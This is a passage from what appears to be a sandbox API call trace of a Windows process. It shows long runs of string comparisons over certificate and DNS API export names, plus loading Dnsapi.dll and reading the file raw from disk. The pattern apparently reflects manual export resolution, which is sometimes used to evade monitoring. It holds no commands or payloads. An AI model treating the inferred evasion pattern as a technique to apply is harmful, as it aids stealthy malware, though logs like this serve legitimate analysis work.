lpString2="CertAddEncodedCRLToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.286] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0150.287] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0150.287] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0150.288] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0150.288] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0150.289] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0150.289] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0150.290] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0150.304] GetProcessHeap () returned 0x520000 [0150.304] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x4127040 | out: hHeap=0x520000) returned 1 [0150.435] GetProcessHeap () returned 0x520000 [0150.435] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5399e0 [0150.436] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0150.452] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0150.452] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0150.452] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0150.452] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0150.453] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0150.453] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0150.453] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0150.453] GetProcessHeap () returned 0x520000 [0150.453] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa7b88) returned 0x3a9d010 [0150.455] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0150.455] ReadFile (in: hFile=0x17c, lpBuffer=0x3a9d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a9d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0150.568] CloseHandle (hObject=0x17c) returned 1 [0150.569] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0150.569] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.569] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0150.569] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.569] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.569] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0150.569] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.569] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.569] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0150.569] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0150.569] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.570] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.570] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0150.570] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0150.570] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0150.570] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.570] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.570] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0150.570] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0150.570] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.570] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0150.570] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.570] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.570] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0150.570] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0150.570] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.570] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0150.570] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0150.570] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.570] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.570] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0150.571] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0150.571] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.571] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0150.571] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0150.571] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0150.571] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.572] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.572] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0150.572] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0150.572] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0150.573] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0150.574] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.574] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0150.575] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0150.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0150.576] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0150.576] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0150.576] lstrcmpA 